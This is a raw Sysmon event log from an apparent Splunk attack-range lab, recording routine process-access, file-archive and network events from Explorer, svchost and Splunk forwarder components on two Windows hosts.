10:59:14.925{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293661Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:14.925{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293660Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:14.193{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293659Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:14.193{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293658Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:14.193{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293657Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:14.002{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5E4DE24A9C03809F4715360459172C7,SHA256=B9D89AF51FF7F3D8AB633CA9A58194C9D77432F6641801C86929B8A2EEC9E64D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218137Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:14.004{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=199051DFBE66D40B7DB77E4A0E337728,SHA256=F909A142FC3DCB3E91BAFBEFFAF7933B24379EFFEC285573B539A530142B1ADD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218138Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:15.098{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3DA5F53B7B7E9AEE2087ADA3D8C932E,SHA256=25C7902E2DB198EFFC3977D627A11CB0741C0C1EBA2F7EA8F85EDF3A876380D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293668Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:12.636{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53824-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000293667Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:15.041{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293666Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:15.041{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293665Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:15.041{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293664Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:15.025{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F2F03380F8479AD8C4D8CC8FC2761F5,SHA256=316619E672BD5B32D42A7741955DFFBC7F1B3573AD1BC9E553E3E4D41E6B4DC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218140Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:13.562{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51440-false10.0.1.12-8000- 23542300x8000000000000000218139Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:16.113{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1036864F05E85F44B9613399F2F34183,SHA256=D7BBAA522FCE7FE06B85C837CB1A0AE193C7BCDED8BF19BB2E97B398E38BE9CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293669Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:16.040{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B35B420AA9EFD12D47D82EE713408A2B,SHA256=8EABAB52AF2D31B0E4EA092FBF24AAEE383D4D97F755B4265FA2C1D84A64AFF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293670Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:17.043{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDFD23FAB8477F4021BD61882C225A61,SHA256=C5BA7690FE969DC8CDB54A3120A266C2AB9B74957D83CD1AAB693C39ED120112,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218141Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:17.129{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56D2B0D120FE911ACD551CAF63EC093C,SHA256=81EF303886A24E41C445F7A0032B2092AF5D5DFC234E574C5C1D463BF8213A0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:18.112{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ABB2DCE33E3F1637889C78C14E0D2E6,SHA256=E0AB58122B412D1D13E0F5B6947AB852E5688FE7257FE3EEB73EDE5F9EBE2AC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218142Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:18.145{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54F3DC7F3824AF8B8607AB07CA55C63E,SHA256=3B5A42DFA933DAEDF1CC040DB775D41F70501C8415DFD858199759B9E2059E1F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293681Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:19.642{C8EA50B7-1387-6216-6F06-000000003802}64046440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293680Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:19.342{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1387-6216-6F06-000000003802}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293679Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:19.342{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293678Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:19.342{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293677Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:19.342{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293676Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:19.342{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1387-6216-6F06-000000003802}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293675Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:19.342{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293674Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:19.342{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1387-6216-6F06-000000003802}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293673Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:19.344{C8EA50B7-1387-6216-6F06-000000003802}6404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000293672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:19.127{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83975031C19E4916638EF2C3FD5B4281,SHA256=ADC3552B57D05E33F5129D5DE751FB8786CABBFD4F17462F5F298921D9550C47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218143Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:59:19.160{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51F4E0B587B73D9E0C5891F79DF4E999,SHA256=CA4DBD073B6997A3DD66B022F3ABA61F6205777703178691D71503C63A7C345A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293701Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.911{C8EA50B7-1388-6216-7106-000000003802}64566380C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293700Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.547{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1388-6216-7106-000000003802}6456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293699Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:59:20.538{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293698Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 